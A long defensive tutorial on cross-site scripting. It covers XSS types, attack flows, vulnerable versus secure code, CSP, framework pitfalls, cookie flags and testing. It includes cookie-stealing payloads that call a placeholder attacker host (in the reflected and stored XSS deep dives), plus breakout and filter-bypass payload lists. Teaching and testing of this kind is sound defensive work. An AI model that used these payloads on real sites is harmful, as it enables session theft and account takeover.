Published
- 34 min read
Understanding and Mitigating Cross-Site Scripting (XSS)
How to Write, Ship, and Maintain Code Without Shipping Vulnerabilities
A hands-on security guide for developers and IT professionals who ship real software. Build, deploy, and maintain secure systems without slowing down or drowning in theory.
Buy the book now
Practical Digital Survival for Whistleblowers, Journalists, and Activists
A practical guide to digital anonymity for people who can’t afford to be identified. Designed for whistleblowers, journalists, and activists operating under real-world risk.
Buy the book now
The Digital Fortress: How to Stay Safe Online
A simple, no-jargon guide to protecting your digital life from everyday threats. Learn how to secure your accounts, devices, and privacy with practical steps anyone can follow.
Buy the book nowIntroduction
Cross-Site Scripting (XSS) is a pervasive vulnerability that affects web applications by allowing attackers to inject malicious scripts into trusted websites. These scripts execute in the context of unsuspecting users’ browsers, leading to stolen session cookies, compromised accounts, and other harmful actions. Despite being well-documented, XSS remains one of the most common security risks, ranking prominently in the OWASP Top 10 vulnerabilities.
This article explores the different types of XSS, their implications, and effective strategies to identify and prevent these attacks, ensuring your web applications remain secure.
What is Cross-Site Scripting (XSS)?
XSS is a type of injection attack that targets vulnerabilities in web applications where user input is not properly validated or sanitized. Attackers exploit these vulnerabilities to inject malicious scripts that execute in the victim’s browser. The malicious scripts are usually written in JavaScript, but other scripting languages like HTML or VBScript can also be used.
Types of XSS
- Stored XSS:
- Malicious scripts are permanently stored on the server (e.g., in a database or file system) and served to users whenever they access the affected page.
- Example: A malicious comment containing a script is saved in a blog post’s database and executed whenever the post is viewed.
- Reflected XSS:
- The malicious script is reflected off the server and included in the response to a user’s request. This often occurs via query parameters or form submissions.
- Example: A search feature displays the input query directly on the page without sanitizing it, allowing an attacker to inject a script.
- DOM-based XSS:
- The vulnerability exists entirely in the client-side code, where scripts manipulate the Document Object Model (DOM) based on untrusted input.
- Example: A script dynamically updates a web page using a URL fragment without validating or escaping it.
The Impact of XSS Attacks
XSS attacks can have severe consequences for both users and organizations. Some of the common impacts include:
- Session Hijacking:
- Attackers can steal session cookies, allowing them to impersonate users.
- Data Theft:
- Malicious scripts can capture sensitive information, such as login credentials or personal data, entered by users.
- Account Compromise:
- By stealing tokens or credentials, attackers can gain unauthorized access to user accounts.
- Reputation Damage:
- If an application is known to have XSS vulnerabilities, it erodes user trust and damages the organization’s reputation.
- Regulatory Non-Compliance:
- XSS vulnerabilities that lead to data breaches may result in penalties under laws like GDPR or HIPAA.
Identifying XSS Vulnerabilities
1. Manual Testing
- Input Fields:
- Test all user input fields by injecting scripts, such as
<script>alert('XSS')</script>. - URLs:
- Include scripts in query parameters or fragments to see if they are executed.
- Form Submissions:
- Submit forms with malicious payloads and observe the server’s response.
2. Automated Tools
- Burp Suite:
- Scans for XSS vulnerabilities and provides detailed reports.
- OWASP ZAP:
- Identifies XSS risks through active and passive scanning.
3. Code Review
- Review server-side and client-side code for unsafe handling of user input.
- Focus on areas where data is directly included in HTML output without sanitization or encoding.
Preventing Cross-Site Scripting
The most effective way to prevent XSS is to ensure that all user input is properly validated, sanitized, and encoded before being processed or displayed.
1. Input Validation
- Whitelist Inputs:
- Define strict rules for acceptable input formats. For example, restrict usernames to alphanumeric characters.
- Reject Dangerous Input:
- Disallow special characters like
<,>,"unless explicitly required.
2. Output Encoding
Encode all data before displaying it in a browser to ensure it is treated as plain text rather than executable code.
Example (JavaScript):
function encodeHTML(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''')
}
3. Use Content Security Policy (CSP)
A CSP restricts the sources from which scripts can be executed. This minimizes the risk of executing malicious scripts even if they are injected.
Example (CSP Header):
Content-Security-Policy: script-src 'self' https://trusted.cdn.com
4. Sanitize User Input
Remove or escape potentially harmful characters from input. Use libraries like DOMPurify for sanitizing HTML content.
Example (DOMPurify in JavaScript):
const clean = DOMPurify.sanitize(dirtyInput)
5. Avoid Inline JavaScript
Do not use inline event handlers like onclick or embed JavaScript directly in HTML. Use external scripts instead, as they are easier to manage and secure.
Real-World Example of XSS Mitigation
Consider an online comment system where users can post comments that are displayed on the webpage. A poorly implemented system might directly insert user input into the HTML, creating a vulnerability.
Vulnerable Code (PHP):
echo "<p>$user_comment</p>";
Secure Code:
- Sanitize Input:
- Remove any harmful characters from the comment before saving it.
- Encode Output:
- Use
htmlspecialcharsto encode the comment before displaying it.
Example:
echo "<p>" . htmlspecialchars($user_comment, ENT_QUOTES, 'UTF-8') . "</p>";
Testing for Secure Implementation
Once mitigation techniques are in place, test the application to ensure XSS vulnerabilities have been addressed. Use tools like:
- Manual Testing: Re-inject payloads to confirm they are neutralized.
- Automated Scanners: Verify that common XSS patterns are no longer executable.
XSS Attack Flows Visualized
Before diving deeper into remediation, it helps to understand exactly how each XSS variant travels from attacker to victim. The three attack patterns differ fundamentally in how the payload is delivered, where it is stored, and where it executes.
Reflected XSS Flow
In reflected XSS, the payload exists only inside a crafted URL or a form submission. The attacker delivers that link to the victim — often via phishing email, forum post, or a redirect — and the server bounces the unescaped input back in the HTML response.
sequenceDiagram
participant A as Attacker
participant V as Victim
participant S as Web Server
A->>V: Sends crafted URL containing malicious payload
V->>S: Clicks link — GET /search?q=<script>stealCookies()</script>
S->>V: Response echoes the unsanitized query in HTML
Note over V: Browser parses response and executes injected script
V->>A: Session token exfiltrated to attacker-controlled server
Because the payload is never written to a database, reflected XSS is sometimes called non-persistent XSS. However, it is far from harmless — a single successful phishing campaign can steal session tokens from thousands of users within minutes.
Stored XSS Flow
Stored XSS — also known as persistent XSS — is the most dangerous variant. The attacker writes the payload into a data store, and it then executes for every subsequent visitor who loads the affected page, often without any further attacker interaction.
sequenceDiagram
participant A as Attacker
participant S as Web Server
participant DB as Database
participant V as Victim
A->>S: POST /comments — submits payload as content
S->>DB: Stores payload without sanitization
V->>S: GET /post/42 — loads page with comments
S->>DB: Fetches stored comments
DB->>S: Returns payload
S->>V: Serves page with embedded malicious script
Note over V: Script executes automatically for every visitor
V->>A: Credentials or tokens sent to attacker
A malicious comment on a popular article can silently compromise thousands of users before a security team notices anything unusual. This is why stored XSS vulnerabilities are typically rated Critical in bug bounty programmes.
DOM-Based XSS Flow
DOM-based XSS is unique because the server response itself is benign. The vulnerability lives entirely in client-side JavaScript that reads from an attacker-controllable source and writes into a dangerous sink — and may never touch the server at all.
sequenceDiagram
participant A as Attacker
participant V as Victim
participant B as Browser / DOM
A->>V: Sends URL with malicious fragment — example.com/page#<img onerror=...>
V->>B: Navigates to URL; HTTP response is safe
Note over B: Client-side JS reads location.hash
B->>B: Writes hash value into innerHTML or calls eval()
Note over B: Script executes entirely in the browser
V->>A: Data exfiltrated without payload ever passing through server
DOM XSS is frequently missed by server-side scanners and WAFs because the dangerous payload never appears in the HTTP request body. Detecting it requires instrumented browser analysis tools such as Burp Suite’s DOM Invader.
Deep Dive: Reflected XSS
Reflected XSS vulnerabilities are extraordinarily common because the failure mode is simple: the application outputs user-supplied data without encoding it. Search pages, error messages, form validation feedback, and URL parameters are prime candidates. The fix is equally straightforward when you know what to look for.
Vulnerable Node.js / Express Example
// ❌ Vulnerable — user input interpolated directly into HTML
app.get('/search', (req, res) => {
const query = req.query.q
res.send(`
<html>
<body>
<h1>Results for: ${query}</h1>
</body>
</html>
`)
})
An attacker crafts the following URL and persuades the victim to click it:
https://example.com/search?q=<script>
document.location='https://evil.example/steal?c='+document.cookie
</script>
The value of query is inserted into the response without encoding. The browser’s HTML parser encounters the <script> tag and executes it immediately, exfiltrating the victim’s session cookie.
Secure Fix
import he from 'he' // npm install he
// ✅ Secure — HTML-encode the query before interpolation
app.get('/search', (req, res) => {
const query = he.encode(String(req.query.q ?? ''))
res.send(`
<html>
<body>
<h1>Results for: ${query}</h1>
</body>
</html>
`)
})
The he.encode() call converts < to <, > to >, and " to ". The browser renders those as visible characters rather than interpreting them as HTML tags. Most server-side template engines (Handlebars, Pug, Nunjucks, Jinja2) auto-escape by default — the risk comes from using unescaped interpolation syntax: {{{ }}} in Handlebars, != in Pug, or | safe in Jinja2.
Common Reflected XSS Entry Points
| Entry Point | Example Parameter | Notes |
|---|---|---|
| Search query | ?q= | Highest frequency in reports |
| Error messages | ?error= | Often reflects the raw input |
| Redirect / return URL | ?next= | Also enables open redirect |
| Username in greetings | ?name= | Common in marketing pages |
| HTTP Referer header | (server-reflected) | Often overlooked by scanners |
| Pagination offsets | ?page= | Usually numeric — easy bypass if not validated |
One often-overlooked vector is the HTTP Referer header or other custom request headers that the server reflects back into the HTML response. Automated scanners typically focus on URL parameters and form fields, so always include header-injection tests in your manual testing checklist.
Deep Dive: Stored XSS
Stored XSS is harder to catch with automated tools because the injection and the execution happen in separate HTTP requests. The scanner may miss the connection between writing a payload to the database and reading it back in a different context.
Classic Attack Scenario
Consider a social platform where users can write a public profile bio:
// ❌ Vulnerable — storing raw HTML
app.post('/api/profile', async (req, res) => {
const { bio } = req.body
await db.query('UPDATE users SET bio = ? WHERE id = ?', [bio, req.user.id])
res.json({ success: true })
})
// ❌ Vulnerable — rendering raw HTML to visitors
app.get('/profile/:id', async (req, res) => {
const [user] = await db.query('SELECT bio FROM users WHERE id = ?', [req.params.id])
res.send(`<div class="bio">${user.bio}</div>`)
})
An attacker sets their bio to:
<img src="x" onerror="fetch('https://evil.example/steal?c='+encodeURIComponent(document.cookie))" />
Every visitor who loads the attacker’s profile page silently sends their cookies to the attacker’s server. On a popular platform this payload can run thousands of times before anyone notices.
Secure Fix
When users need to submit formatted content, use DOMPurify on the server side to strip everything dangerous while preserving safe markup:
import createDOMPurify from 'dompurify'
import { JSDOM } from 'jsdom'
const window = new JSDOM('').window
const DOMPurify = createDOMPurify(window)
// ✅ Secure — sanitize on the way in
app.post('/api/profile', async (req, res) => {
const cleanBio = DOMPurify.sanitize(req.body.bio, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href']
})
await db.query('UPDATE users SET bio = ? WHERE id = ?', [cleanBio, req.user.id])
res.json({ success: true })
})
If rich HTML is not required at all, reject it entirely — store the value as plain text and HTML-encode on output. This is the safest option whenever a WYSIWYG editor is not part of the feature.
Deep Dive: DOM-Based XSS
DOM-based XSS requires understanding JavaScript execution paths rather than HTTP request/response pairs. In modern single-page applications that manipulate the DOM in response to URL state or API data, it is the most common form of XSS encountered during real-world penetration tests.
Sources and Sinks
DOM XSS flows from sources — attacker-controlled entry points into client-side code — into sinks — operations that act on that data in a dangerous way.
Common sources:
location.href,location.hash,location.searchdocument.referrerpostMessageevent datawindow.localStorage,window.sessionStoragedocument.cookie
Dangerous sinks:
innerHTML,outerHTML,insertAdjacentHTML()document.write(),document.writeln()eval(),new Function(),setTimeout(string),setInterval(string)location.href = untrustedData(enablesjavascript:URLs)- jQuery’s
$(untrustedData),.html(),.append()with HTML strings
Vulnerable Example
// URL: https://example.com/welcome#<img src=x onerror=alert(document.cookie)>
// ❌ Vulnerable — reads location.hash and writes to innerHTML
const fragment = decodeURIComponent(location.hash.slice(1))
document.getElementById('greeting').innerHTML = `Welcome back, ${fragment}!`
The decodeURIComponent call is particularly dangerous here because it will decode %3Cscript%3E back into <script>, bypassing any naive string-based filter that looked for the literal < character.
Secure Fix
// ✅ Secure — use textContent; it never interprets markup
const fragment = decodeURIComponent(location.hash.slice(1))
document.getElementById('greeting').textContent = `Welcome back, ${fragment}!`
// ✅ If HTML rendering is genuinely needed, sanitize first
import DOMPurify from 'dompurify'
document.getElementById('greeting').innerHTML = DOMPurify.sanitize(`Welcome back, ${fragment}!`)
textContent is the simplest and safest fix — it treats everything as a raw string and never parses HTML. Prefer it over innerHTML any time the content does not need to render formatted markup.
Vulnerable vs. Secure Code Patterns
The following side-by-side comparisons cover the most frequently encountered XSS-prone patterns across different languages and contexts.
Pattern 1: Building HTML via String Concatenation
// ❌ Vulnerable
function renderUsername(name) {
document.body.innerHTML += '<h2>Hello, ' + name + '!</h2>'
}
// ✅ Secure — create elements programmatically
function renderUsername(name) {
const h2 = document.createElement('h2')
h2.textContent = `Hello, ${name}!`
document.body.appendChild(h2)
}
Pattern 2: jQuery HTML Methods
jQuery’s .html() and .append() with HTML strings both invoke the browser’s HTML parser, making them equivalent to innerHTML assignment.
// ❌ Vulnerable
$('#message').html(userInput)
$('#container').append('<li>' + userInput + '</li>')
// ✅ Secure
$('#message').text(userInput)
$('#container').append($('<li>').text(userInput))
Pattern 3: Server-Side Template Literals (Node.js / TypeScript)
import express, { Request, Response } from 'express'
import he from 'he'
const app = express()
// ❌ Vulnerable
app.get('/greet', (req: Request, res: Response) => {
const name = req.query.name as string
res.send(`<p>Hello, ${name}</p>`)
})
// ✅ Secure
app.get('/greet', (req: Request, res: Response) => {
const name = he.encode(String(req.query.name ?? 'guest'))
res.send(`<p>Hello, ${name}</p>`)
})
Pattern 4: href Attribute Assigned from User Input
A javascript: URL in an href attribute will execute when the link is clicked. Always validate the scheme before assigning it to a link element.
// ❌ Vulnerable
const link = document.createElement('a')
link.href = userProvidedUrl // could be javascript:alert(1)
// ✅ Secure — only allow http and https
function setSafeHref(anchor, rawUrl) {
try {
const parsed = new URL(rawUrl, window.location.origin)
if (['http:', 'https:'].includes(parsed.protocol)) {
anchor.href = parsed.href
} else {
anchor.removeAttribute('href')
}
} catch {
anchor.removeAttribute('href') // invalid URL
}
}
Pattern 5: SSR State Injection (Next.js / Express)
Embedding application state in a <script> tag via JSON serialization is a standard SSR pattern, but JSON.stringify does not escape </script> sequences — a payload containing </script><script>alert(1)</script> inside a JSON string can break out of the script block.
// ❌ Vulnerable — JSON.stringify does not escape </script>
const html = `<script>window.__DATA__ = ${JSON.stringify(serverData)}</script>`
// ✅ Secure — use serialize-javascript which escapes </script> and other dangerous sequences
import serialize from 'serialize-javascript'
const html = `<script>window.__DATA__ = ${serialize(serverData)}</script>`
Content Security Policy: In-Depth Configuration
Content Security Policy (CSP) is an HTTP response header that instructs the browser which origins are permitted to load and execute resources. A well-crafted CSP is one of the most effective second layers of defense against XSS — even if an attacker successfully injects a script, the browser will refuse to run it if the policy forbids it.
How CSP Works
The browser enforces CSP before executing any resource loaded in the response. A strong baseline policy for a typical web application looks like this:
Content-Security-Policy:
default-src 'self';
script-src 'self' https://cdn.example.com;
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
font-src 'self';
object-src 'none';
base-uri 'self';
form-action 'self';
frame-ancestors 'none';
upgrade-insecure-requests;
Key directives to understand:
default-src 'self'— Allow resources only from the same origin by default. All other directives override this for their specific resource type.script-src 'self'— Restrict scripts to your own origin; list any trusted CDNs explicitly.object-src 'none'— Block Flash and all plugin-based vectors entirely.base-uri 'self'— Prevents attackers from injecting a<base>tag that redirects all relative URL resolutions.form-action 'self'— Ensures forms can only submit to your own origin, blocking data exfiltration via form hijacking.frame-ancestors 'none'— Equivalent toX-Frame-Options: DENY; prevents clickjacking.
Nonces for Inline Scripts
The most secure CSPs avoid 'unsafe-inline' entirely. When inline scripts cannot be eliminated, use per-request nonces:
import crypto from 'crypto'
// Middleware generates a fresh nonce for every response
app.use((req, res, next) => {
res.locals.nonce = crypto.randomBytes(16).toString('base64')
res.setHeader(
'Content-Security-Policy',
`script-src 'nonce-${res.locals.nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'self';`
)
next()
})
<!-- Template uses the nonce on every legitimate inline script -->
<script nonce="<%= nonce %>">
initApp() // allowed
</script>
<!-- An attacker's injected script has no nonce and is blocked -->
<script>
stealCookies()
</script>
The 'strict-dynamic' keyword extends trust from the nonce-bearing script to any scripts it dynamically creates, which makes it compatible with modern bundlers that split code into lazy-loaded chunks.
CSP in Report-Only Mode
Before enforcing a new policy on production traffic, run it in report-only mode to catch both real violations and legitimate resources you forgot to allow:
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-violations
Violations are sent as JSON POST requests to your endpoint. Once you have confirmed that no legitimate traffic is affected, change the header name to Content-Security-Policy to start enforcing it.
What CSP Cannot Replace
CSP is depth-in-defense, not a substitute for output encoding. It can frequently be bypassed when the policy allows broad CDN domains: a policy with script-src ajax.googleapis.com is exploitable via old Angular versions hosted on that domain. It also does nothing to prevent DOM-based XSS when the dangerous script itself is a trusted nonce bearer. Output encoding, HTML sanitization, and proper DOM API usage remain the primary defenses.
Framework-Specific XSS Prevention
Modern JavaScript frameworks reduce XSS risk by default, but every framework has escape hatches that reintroduce the vulnerability if used with untrusted data.
React
React automatically HTML-encodes all values interpolated with JSX curly braces. The following is safe regardless of what username contains:
const username = '<script>alert(1)</script>'
return <p>Hello, {username}!</p>
// Renders safely as: Hello, <script>alert(1)</script>!
React-specific pitfalls:
1. dangerouslySetInnerHTML — the name is an intentional warning. Never pass unsanitized data to it:
// ❌ Dangerous
;<div dangerouslySetInnerHTML={{ __html: userBio }} />
// ✅ Safe
import DOMPurify from 'dompurify'
;<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userBio) }} />
2. javascript: URLs in href — React does not validate href values. Always enforce protocol allowlisting:
// ❌ Dangerous
;<a href={userProvidedUrl}>Profile</a>
// ✅ Safe
const isSafeUrl = (url: string): boolean => /^https?:\/\//i.test(url)
;<a href={isSafeUrl(userProvidedUrl) ? userProvidedUrl : '#'}>Profile</a>
3. SSR data injection — when rendering the initial page with Next.js or a custom Express SSR setup, serialize state safely:
// ❌ JSON.stringify does not escape </script>
const html = `<script>window.__INITIAL_STATE__=${JSON.stringify(state)}</script>`
// ✅ serialize-javascript escapes </script> and unicode control sequences
import serialize from 'serialize-javascript'
const html = `<script>window.__INITIAL_STATE__=${serialize(state)}</script>`
Angular
Angular’s template engine escapes all values bound with {{ }} and attribute bindings by default. Bypass functions in DomSanitizer must be treated with extreme caution:
import { DomSanitizer, SafeHtml, SecurityContext } from '@angular/platform-browser';
// ❌ Dangerous — disables all sanitization for the given HTML
bypassAndRender(html: string): SafeHtml {
return this.sanitizer.bypassSecurityTrustHtml(html);
}
// ✅ Safe — Angular's own sanitizer strips dangerous content
sanitizeAndRender(html: string): string {
return this.sanitizer.sanitize(SecurityContext.HTML, html) ?? '';
}
Never call any bypassSecurityTrust* method with user-controlled content. Angular provides these methods exclusively for pre-reviewed, developer-authored HTML — not user input.
Vue
Vue auto-escapes values in {{ }} template interpolations. The v-html directive is the primary XSS vector:
<!-- ❌ Dangerous — v-html renders raw HTML without escaping -->
<div v-html="userContent"></div>
<!-- ✅ Safe — sanitize first using DOMPurify -->
<script setup lang="ts">
import { computed } from 'vue'
import DOMPurify from 'dompurify'
const props = defineProps<{ userContent: string }>()
const safeContent = computed(() => DOMPurify.sanitize(props.userContent))
</script>
<div v-html="safeContent"></div>
For Vue SSR with Nuxt.js, use the devalue library instead of JSON.stringify when serializing state into the page — it handles circular references and prevents </script> injection vectors that JSON.stringify misses.
Common Mistakes and Anti-Patterns
Knowing what not to do is just as important as knowing best practices. The following mistakes appear regularly in code reviews and bug bounty submissions.
Mistake 1: Blocklist Filtering Instead of Output Encoding
Blocking specific tags like <script> is trivially bypassed with event handler attributes or alternative tags:
// ❌ Easily bypassed — attacker uses <img onerror=...> instead
const unsafe = input.replace(/<script>/gi, '').replace(/<\/script>/gi, '')
// An attacker submits: <img src=x onerror="stealCookies()">
// The filter does nothing; the payload survives
// ✅ Encode everything — safe by construction
import he from 'he'
const safe = he.encode(input)
Mistake 2: Trusting the Referer Header
The Referer header is fully controlled by the attacker. Reflecting it in a response creates a stored or reflected XSS vector:
// ❌ Vulnerable
echo "You came from: " . $_SERVER['HTTP_REFERER'];
// ✅ Safe — never reflect request headers directly into HTML
// Log them server-side if needed; never render them to users
Mistake 3: Client-Side-Only Input Validation
Browser-side validation can be completely bypassed by sending a raw HTTP request with curl, Burp Suite, or any scripting language. Always enforce validation on the server regardless of what the front end does:
<!-- ❌ Relies entirely on the browser -->
<input type="text" pattern="[A-Za-z0-9]+" oninput="this.setCustomValidity('')" required />
<!-- The attacker simply sends a POST request directly to the endpoint -->
Validate all inputs server-side using an allowlist (permitted characters or formats), and treat client-side validation as a UX enhancement only.
Mistake 4: Using eval() with Any User-Controlled Data
Any call to eval(), new Function(), setTimeout(string), or setInterval(string) with user-controlled data is a remote code execution risk, not just an XSS risk:
// ❌ Remote code execution — never pass user input to eval
const formula = req.query.formula
const result = eval(formula)
// ✅ Use a purpose-built sandboxed evaluator for dynamic expressions
import { evaluate } from 'mathjs'
const result = evaluate(formula) // restricted to math operations
Mistake 5: Assuming Sanitization at Write Time is Sufficient
Sanitizing on the way into the database is a good practice, but it is not a substitute for encoding on output. The context at render time determines which encoding rules apply. Data that is safe to render in a <div> body may still be dangerous inside a <script> block or a CSS value. Always encode for the specific rendering context, regardless of how the data was stored.
Mistake 6: Using innerHTML to “Clone” Text
Developers sometimes use element.innerHTML = otherElement.innerHTML to copy content between DOM nodes. If the source element was populated from user input — even through a “safe” path — the copy operation can reintroduce an XSS vector:
// ❌ Copies raw HTML, which may contain injected content
targetElement.innerHTML = sourceElement.innerHTML
// ✅ Clone the DOM node itself (preserves structure, sanitization already applied)
targetElement.innerHTML = ''
targetElement.appendChild(sourceElement.cloneNode(true))
Advanced Testing for XSS
Thorough XSS testing requires going far beyond the classic <script>alert(1)</script> payload. Real-world defenses often block obvious signatures while leaving more creative vectors completely open.
Manual Testing Strategy
Step 1 — Map all input entry points. Identify every location where user-supplied data enters the application: URL parameters, path segments, form fields, HTTP headers (User-Agent, Referer, X-Forwarded-For, Cookie names), WebSocket messages, and postMessage handlers.
Step 2 — Inject a unique probe string. Insert a distinctive marker such as xsstest99abc into each entry point and search the rendered HTML response for where it appears. This reveals the rendering context (HTML body, attribute value, JavaScript string, CSS property) without triggering WAF alerts.
Step 3 — Choose a context-appropriate payload. Each rendering context requires a different breakout technique:
| Rendering Context | Breakout Technique |
|---|---|
| HTML body | <script>alert(1)</script> or <img src=x onerror=alert(1)> |
| Quoted HTML attribute | " onmouseover="alert(1) |
| Unquoted HTML attribute | onmouseover=alert(1) x= |
| JavaScript string (single-quoted) | '; alert(1)// |
| JavaScript template literal | ${alert(1)} |
| URL in href/src | javascript:alert(1) |
| CSS value | expression(alert(1)) (legacy IE) |
Step 4 — Test filter bypass techniques. If basic payloads are blocked, try:
- Case variation:
<ScRiPt>alert(1)</sCrIpT> - HTML entities in attribute context:
onerror - Double URL encoding:
%253Cscript%253E - Null bytes to break parser context:
<scri\x00pt> - Tag without closing bracket:
<script/XSS src=data:,alert(1)> - Unicode escapes inside scripts:
\u003cscript\u003ealert(1)\u003c/script\u003e
Automated Tools
Burp Suite Pro is the gold standard for XSS scanning. Its active scanner applies hundreds of context-aware payloads and detects reflected, stored, and — with DOM Invader — DOM-based XSS with high reliability. Configure it with your authenticated session cookie to cover all authenticated endpoints.
OWASP ZAP is the leading open-source alternative. It supports active scanning, fuzzing, and a scriptable automation API that integrates cleanly into CI/CD pipelines. ZAP’s AJAX Spider crawls single-page applications that ZAP’s standard spider would otherwise miss.
DOM Invader (bundled with Burp Suite’s embedded Chromium browser) specifically targets DOM-based XSS by instrumenting the browser to track taint flow from sources to sinks in client-side JavaScript — a capability that purely HTTP-based scanners fundamentally cannot replicate.
Semgrep provides static analysis XSS rules that run at the code level before the application is deployed:
# Run the OWASP Top 10 rule set, which includes XSS patterns
semgrep --config p/owasp-top-ten src/
Integrating XSS Scanning into CI/CD
Catching XSS regressions before they reach production is far cheaper than fixing a live vulnerability. Run a DAST scan against your staging environment on every pull request that modifies template files, route handlers, or DOM manipulation code:
# .github/workflows/security.yml
name: Security Scan
on:
pull_request:
paths:
- 'src/**/*.js'
- 'src/**/*.ts'
- 'views/**'
- 'templates/**'
jobs:
dast:
runs-on: ubuntu-latest
steps:
- name: OWASP ZAP Baseline Scan
uses: zaproxy/[email protected]
with:
target: 'https://staging.example.com'
rules_file_name: '.zap/rules.tsv'
fail_action: true # treat findings as build failures
Set XSS findings of medium severity or higher as build-breaking failures. Lower severity findings can be tracked in your issue tracker for prioritized remediation. This approach ensures that a new feature cannot ship if it accidentally introduces an injection point, and it builds a culture of security awareness into the normal development workflow.
XSS in Modern API-Driven Applications
The shift toward single-page applications (SPAs) backed by JSON APIs has changed the XSS threat landscape in meaningful ways. Traditional server-rendered applications had a relatively clear separation between the data layer and the presentation layer — HTML was built on the server, so encoding happened there. In API-driven applications, the browser constructs the HTML using raw data fetched from API endpoints, which shifts the encoding responsibility entirely to the client-side JavaScript code. This is a harder problem to solve consistently.
Consider a React front end that fetches a list of user posts from a REST API and renders them in a feed. The API returns JSON, which React components display as JSX. If the component uses normal JSX interpolation ({post.content}), React handles encoding automatically, and XSS is prevented. But if a developer notices that some content uses basic Markdown or HTML formatting and decides to render it with dangerouslySetInnerHTML to “fix” the display, a reflected or stored XSS vulnerability is instantly reintroduced — and it may not be obvious to reviewers scanning the code quickly.
GraphQL APIs introduce an additional consideration: the rich querying capability that makes GraphQL attractive also makes it easier for attackers to extract deeply nested, unsanitized string fields that might not have been individually tested. When a field like bio or comment was never designed to hold markup but a developer later starts rendering it as HTML on a specific page, an existing stored payload in that field suddenly becomes exploitable even though neither the API nor the database changed.
WebSockets deserve special attention in XSS contexts because they establish long-lived bidirectional channels that bypass many of the request-level validation controls developers rely on. A WebSocket message handler that directly writes received data into the DOM — for example, to implement a real-time chat feature — is an unguarded stored XSS sink if the server relays user-generated content without sanitization. Unlike HTTP responses, WebSocket messages are not covered by most traditional WAF rulesets, so they often receive less scrutiny during security reviews.
When building applications with server-sent events (SSE), postMessage, or broadcast channel APIs, the same principle applies: any data flowing from an external origin or a user into the DOM must be treated as untrusted and sanitized or encoded before being rendered. The novelty of the transport mechanism does not change the fundamental rule.
API responses that include HTML in JSON fields (for example, a CMS delivery API that returns rich text as HTML) are a particularly tricky case. There is often no way to know at render time how thoroughly the content was sanitized when it was authored. The correct approach is to sanitize it again on the front end — DOMPurify is fast enough that even sanitizing hundreds of rich-text fields on a single page is not a performance concern. Double sanitization is always safe; double encoding can break rendering, but double sanitization merely ensures that any content that slipped through one pass is caught by the next.
The takeaway for API-driven applications is that the browser has become the rendering engine and the trust boundary simultaneously. Treat every piece of data returned from an API — including your own internal APIs — as untrusted at the point where it is injected into the DOM, and apply the same encoding and sanitization discipline you would apply to data from an external user.
Cookie Security as an XSS Safety Net
Even when XSS mitigation controls are working correctly, defense-in-depth requires reducing the impact of a hypothetical successful attack. Session cookie theft is the most common goal of XSS exploitation, so configuring cookie security attributes properly can dramatically limit what an attacker can do even if they find a way to run JavaScript in the victim’s browser.
The HttpOnly flag instructs the browser not to expose the cookie to JavaScript at all. Any cookie set with HttpOnly will be sent automatically with HTTP requests but will not appear in document.cookie and cannot be accessed via any JavaScript API. For session tokens, there is almost never a legitimate reason to access them from JavaScript, so HttpOnly should be enabled on every session cookie without exception. A successful XSS payload that attempts document.cookie to steal the session token will simply receive an empty string if HttpOnly is set.
Setting cookies with HttpOnly does not make XSS exploitation impossible — a sophisticated attacker can still use JavaScript to make authenticated API requests on behalf of the victim, modify page content, capture keystrokes, redirect the user, or exfiltrate other sensitive data visible in the DOM. But it does eliminate the single most common and automated form of exploitation (session hijacking) and forces attackers to use more targeted, complex payloads that are less likely to succeed at scale.
The Secure flag ensures the cookie is only transmitted over HTTPS, which prevents it from being intercepted over an unencrypted connection. Combined with HttpOnly, this is the baseline security posture for all session cookies. Most modern web frameworks set these flags by default in their production session configurations; make sure your staging and development environments are not silently overriding them.
The SameSite attribute controls whether cookies are sent with cross-site requests. Setting SameSite=Strict means the cookie is only sent when the request originates from the same site as the one that set the cookie, which provides significant protection against cross-site request forgery (CSRF). SameSite=Lax (the default in modern browsers) allows cookies to be sent with top-level navigation GET requests but blocks them in cross-site sub-resource requests. SameSite=None must be paired with Secure and is used only for cookies that legitimately need to be sent in cross-site contexts, such as third-party embedded widgets.
Cookie prefixes provide an additional layer of protection. A cookie named __Host-session will be rejected by the browser unless it was set with the Secure flag, without a Domain attribute, and with a Path=/ attribute. This prevents subdomain attacks where a compromised subdomain might otherwise be able to set cookies for the parent domain. The __Secure- prefix requires only the Secure flag; __Host- is the stronger variant and recommended for session tokens.
In combination with a well-configured CSP, HttpOnly cookies significantly raise the cost of XSS exploitation. An attacker who cannot steal the session token and cannot load external scripts is left with a much more limited and less reliable set of attack options.
Notable XSS Incidents in the Wild
Understanding the real-world impact of XSS vulnerabilities is a powerful motivator for prioritizing their prevention. Several high-profile incidents in the history of web security illustrate just how destructive a single XSS flaw can be when it affects a widely used platform.
The Samy Worm from 2005 remains the most famous XSS incident in history. A young developer named Samy Kamkar found a stored XSS vulnerability on MySpace and wrote a self-propagating worm that added him as a friend on every profile that viewed its carrier page, while simultaneously copying itself to that profile’s page. Within approximately twenty hours of release, the worm had infected over one million MySpace profiles. MySpace was forced to take the entire site offline to contain it. The worm itself was relatively benign — Samy’s payload just displayed “but most of all, samy is my hero” on every infected page — but it demonstrated definitively that stored XSS could scale to mass impact without any additional user interaction beyond a single page view.
The British Airways data breach of 2018 resulted in approximately 500,000 customers having their personal and payment card details stolen. Investigators later attributed the attack to the Magecart group, who planted a malicious script in the airline’s booking page that captured form data and transmitted it to an attacker-controlled server. While the initial access vector differed from classic XSS, the attack demonstrated the “formjacking” technique — injecting JavaScript into a trusted site to intercept sensitive data as it is typed — which is conceptually identical to what a stored XSS payload can accomplish. The breach resulted in an initial fine of £183 million under GDPR, later reduced on appeal.
The eBay XSS vulnerability reported by security researcher MLT in 2014 allowed attackers to inject HTML and JavaScript into active listings. Crafted eBay listings distributing malware-laden code were observed in the wild before the vulnerability was patched. Because eBay is a transactional platform with strong user trust, a visitor viewing a compromised listing had no reason to suspect that simply browsing the page could expose them to browser-based attacks.
